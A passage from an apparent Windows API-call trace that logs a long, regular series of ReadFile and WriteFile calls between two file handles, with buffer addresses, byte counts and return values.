lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.129] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.130] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.130] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x256, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.130] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.131] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x264, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.132] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.132] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x266, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.133] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.133] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x27a, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.133] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.134] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.134] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.135] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2c1, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.135] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.136] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x28e, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.136] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.137] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2a5, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.137] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.138] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x28d, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.138] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.139] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2ad, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.139] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.140] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x305, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.140] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.141] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x29e, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.141] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.142] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x25b, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.142] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.143] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x28c, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.143] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.144] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x24f, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.144] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.145] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x324, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.145] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.146] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2ba, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.146] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.147] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2c3, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.147] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.148] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x302, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.148] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.149] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2f4, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.149] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.150] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.150] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.151] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x255, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.151] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.151] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2f0, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.152] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.152] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.153] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x54, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.153] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.154] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.154] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0xd2, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.155] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.155] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2cf, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.156] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.156] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x283, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.157] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.157] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x27d, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.158] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.158] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x261, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.159] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.159] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x286, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.160] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.160] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x276, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.161] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.161] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x268, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.162] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.162] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x28b, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.163] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.163] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2c6, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.164] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.164] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x294, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.165] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.165] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x292, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.166] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.166] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2f0, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.167] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.167] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2c3, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.168] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.168] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2c1, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.169] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.169] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2a5, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.169] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.170] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x325, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.170] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.171] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x30d, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.172] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.172] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x25e, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.172] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.173] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2bd, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.173] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.174] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2bd, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.174] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.175] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x314, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.175] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.176] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2bb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.176] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.177] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x35e, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, 